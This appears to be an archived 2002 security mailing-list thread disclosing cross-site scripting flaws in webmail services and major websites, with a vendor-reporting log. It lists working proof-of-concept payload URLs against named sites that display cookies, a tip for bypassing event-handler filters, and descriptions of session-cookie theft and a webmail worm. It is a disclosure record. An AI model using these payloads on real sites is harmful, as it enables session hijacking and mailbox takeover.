RE: Cross site scripting in almost every mayor website
Hello, We have discovered this quite a while ago (when investigating GM#001-IE, actually) and have verified it to work on the following services/applications: * hotmail.com * msn.com * yahoo.com * mail.com * iname.com * lycos.com * excite.com * Qualcomm Eudora The code published by SkyLined is obviously a slightly altered version of the data binding code that appears in GM#001-IE (even the elements id's remained the same), so we feel that an acknowledgment was in place. Either way, we were planning to release this after we had the opportunity to contact each and every vendor in the above list, but since this is out in the open there's no reason for that now. A little example of embedding an iframe: <iframe src="http://security.greymagic.com/adv/gm001-ie/"></iframe>; When trying to inject script into yahoo (and others) using events such as onerror, yahoo tries to filter them out even if they appear inside the element. This can be easily bypassed by using onerror instead of onerror, for example. Regards. -Original Message- From: Berend-Jan Wever [mailto:[EMAIL PROTECTED]] Sent: Sunday, April 21, 2002 12:50 To: [EMAIL PROTECTED] Subject: Re: Cross site scripting in almost every mayor website Been there, done that. I have successfully created a worm and tested it before trying to report this to McAfee, they do the vrus scanning for hotmail. I got a "you are not a registered user" auto-reply and they ignored my messages because I wasn't in their files ;( too bad for them. You do have full access to the DOM of Hotmail when you can find a way to cross-site script, thus allowing you full access to the inbox, address book etc... BJ - Original Message - From: FozZy To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] ; vuln- [EMAIL PROTECTED] Sent: Sunday, April 21, 2002 3:53 Subject: Re: Cross site scripting in almost every mayor website To webmail developpers : there is something interesting for you hidden in this post. The Hotmail problem was a "evil html filtering" problem in incoming e-mails. It was possible to bypass the filter by injecting javascript with XML, when parsed with IE. See : http://spoor12.edup.tudelft.nl/SkyLined/docs/ie.hot mail.howto.css.html *** I guess that many other webmails are vulnerable to this attack. *** I verified that Yahoo is vulnerable with IE 5.5 (but they have other bugs and they don't care, see http://online.securityfocus.com/archive/1/265464). I did not checked other webmails, but I am sure almost every one can be cracked this way. > The fix: as far as I could find out they now replace > the properties 'dataFld', 'dataFormatAs' > and 'dataSrc' of any HTML tag > with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to > prevent XML generation of HTML alltogether. The implication of executing javascript is that an incoming email can control the mailbox of the user. It is also possible to send the session cookie to a cgi script and read remotely all the e- mails. (BTW, it is still possible to do that on Hotmail and on almost every webmail, since they don't check the IP address, even without this XML trick cause their filters are sooo bad) I fear that a cross-platform and cross-site webmail worm deleting all the emails and spreading could appear in the near future. Please Hotmail Yahoo & co, do something before it comes true... FozZy Hackademy / Hackerz Voice http://www.dmpfrance.com/inted.html
Re: Cross site scripting in almost every mayor website
Been there, done that. I have successfully created a worm and tested it before trying to report this to McAfee, they do the vrus scanning for hotmail. I got a "you are not a registered user" auto-reply and they ignored my messages because I wasn't in their files ;( too bad for them. You do have full access to the DOM of Hotmail when you can find a way to cross-site script, thus allowing you full access to the inbox, address book etc... BJ - Original Message - From: FozZy To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] ; vuln- [EMAIL PROTECTED] Sent: Sunday, April 21, 2002 3:53 Subject: Re: Cross site scripting in almost every mayor website To webmail developpers : there is something interesting for you hidden in this post. The Hotmail problem was a "evil html filtering" problem in incoming e-mails. It was possible to bypass the filter by injecting javascript with XML, when parsed with IE. See : http://spoor12.edup.tudelft.nl/SkyLined/docs/ie.hot mail.howto.css.html *** I guess that many other webmails are vulnerable to this attack. *** I verified that Yahoo is vulnerable with IE 5.5 (but they have other bugs and they don't care, see http://online.securityfocus.com/archive/1/265464). I did not checked other webmails, but I am sure almost every one can be cracked this way. > The fix: as far as I could find out they now replace > the properties 'dataFld', 'dataFormatAs' > and 'dataSrc' of any HTML tag > with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to > prevent XML generation of HTML alltogether. The implication of executing javascript is that an incoming email can control the mailbox of the user. It is also possible to send the session cookie to a cgi script and read remotely all the e- mails. (BTW, it is still possible to do that on Hotmail and on almost every webmail, since they don't check the IP address, even without this XML trick cause their filters are sooo bad) I fear that a cross-platform and cross-site webmail worm deleting all the emails and spreading could appear in the near future. Please Hotmail Yahoo & co, do something before it comes true... FozZy Hackademy / Hackerz Voice http://www.dmpfrance.com/inted.html
Re: Cross site scripting in almost every mayor website
To webmail developpers : there is something interesting for you hidden in this post. The Hotmail problem was a "evil html filtering" problem in incoming e-mails. It was possible to bypass the filter by injecting javascript with XML, when parsed with IE. See : http://spoor12.edup.tudelft.nl/SkyLined/docs/ie.hotmail.howto.css.html *** I guess that many other webmails are vulnerable to this attack. *** I verified that Yahoo is vulnerable with IE 5.5 (but they have other bugs and they don't care, see http://online.securityfocus.com/archive/1/265464). I did not checked other webmails, but I am sure almost every one can be cracked this way. > The fix: as far as I could find out they now replace > the properties 'dataFld', 'dataFormatAs' > and 'dataSrc' of any HTML tag > with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to > prevent XML generation of HTML alltogether. The implication of executing javascript is that an incoming email can control the mailbox of the user. It is also possible to send the session cookie to a cgi script and read remotely all the e-mails. (BTW, it is still possible to do that on Hotmail and on almost every webmail, since they don't check the IP address, even without this XML trick cause their filters are sooo bad) I fear that a cross-platform and cross-site webmail worm deleting all the emails and spreading could appear in the near future. Please Hotmail Yahoo & co, do something before it comes true... FozZy Hackademy / Hackerz Voice http://www.dmpfrance.com/inted.html
Cross site scripting in almost every mayor website
On april 26 I posted a message about Cross-Site scripting (see bottom) I mentioned that I had found Cross-site scripting flaws in many major websites but I did not publish the exact details of these flaws. After notifying the owners of these sites and giving them time to respond and fix the problem, I now feel I have to post the details to bugtraq. This information and more on cross-site scripting can also be found on my website http://spoor12.edup.tudelft.nl/skylined which is updated almost daily. Kind regards, Berend-Jan Wever. Cross-site scripting archive: Here are all the sites that I know to have at least one cross-site scripting flaw. I have logged all the communication I have had with them. (Last update April 19, 2002) www.search.com http://www.search.com/search? q='>' - 23 mar 2002 Reported @ "http://www.cnet.com/cnetsupport/contact/1,10 161,0-3945,00.html" - 28 mar 2002 Reported @ "http://www.search.com/feedback/"; -- -- www.altavista.com http://www.altavista.com/sites/search/web? q=*&kl="> - 23 mar 2002 Reported @ "http://help.altavista.com/contact/search"; - 25 mar 2002 Reply by email: "We have forwarded your email to our engineering team for further investigation" -- -- edit.yahoo.com http://edit.yahoo.com/config?.done="% 20style="width:expression(document.write (document.cookie)); - 27 mar 2002 Reported to "arturo@yahoo- inc.com", "[EMAIL PROTECTED]" -- -- search.netscape.com addressbook.netscape.com http://search.netscape.com/search.psp? search="> http://addressbook.netscape.com/search.adp? SearchStr="> (Addressbook.netscape.com requires you to be logged in) - 23 mar 2002 Reported @ "http://help.netscape.com/website/feedback.ht ml" -- -- cq-search.ebay.com http://cq- search.ebay.com/search/search.dll? MfcISAPICommand=GetResult&ht=">&query=a - 26 mar 2002 Reported to "[EMAIL PROTECTED]" - 27 mar 2002 Reply by email: "Reviewing the issue", "Do you have any suggestions?" - 27 mar 2002 Gave some hints and told them about my CSS howto. -- -- www.amazon.com http://www.amazon.com/exec/obidos/ASIN/B 5T68P/ref%3D%20style%3Dwidth% 3Aexpression%28document.write% 28document.cookie%29%29%20/ - 23 mar 2002 Reported @ "http://www.amazon.com/exec/obidos/handle- generic-form/102-3185800-6674542?action=next- page&target=stores/help/self-service-email-form- dispatch.html&display=basic&browse=560710&m ethod=GET&cgi-post-result=1/102-3185800- 6674542." - 26 mar 2002 "[EMAIL PROTECTED]" responded to my bugtraq post - 26 mar 2002 Reported to "[EMAIL PROTECTED]" - 26 mar 2002 Told them about my CSS howto. -- -- www.looksmart.com cnn.looksmart.com http://www.looksmart.com/r_search? look=&key=> http://cnn.looksmart.com/r_search? look=&key=> - 23 mar 2002 Reported to "[EMAIL PROTECTED]" -- -- www.time.com http://www.time.com/time/searchresults? query=a&summaries="% 20style="width:expression(document.write (document.cookie))" - 23 mar 2002 Reported to "[EMAIL PROTECTED]" - 26 mar 2002 Reported to "[EMAIL PROTECTED]" -- -- www.infospace.com http://www.infospace.com/info.xcite/dog/newsresul ts.htm?&qkw=">&qcat=news&fs=nws - 23 mar 2002 Reported @ "http://www.infospace.com/info/redirs_all.htm? pgtarg=abtct&" -- -- www.lasseters.com.au http://www.lasseters.com.au/default3.asp? Network="%20onload="alert(document.cookie);"% 20z=" - 28 mar 2002 Reported @ "http://www.lasseters.com.au/help/onetoone.ht ml" to Karl F (chatid 114640) - 28 mar 2002 Reported to "[EMAIL PROTECTED]" - 28 mar 2002 (Automated) reply by email: "our priority is to respond to your query as soon as possible", tracking number T20020328004M - 28 mar 2002 Reply by email: "We are investigating this issue very seriously", "I have passed this information onto the relevant department" -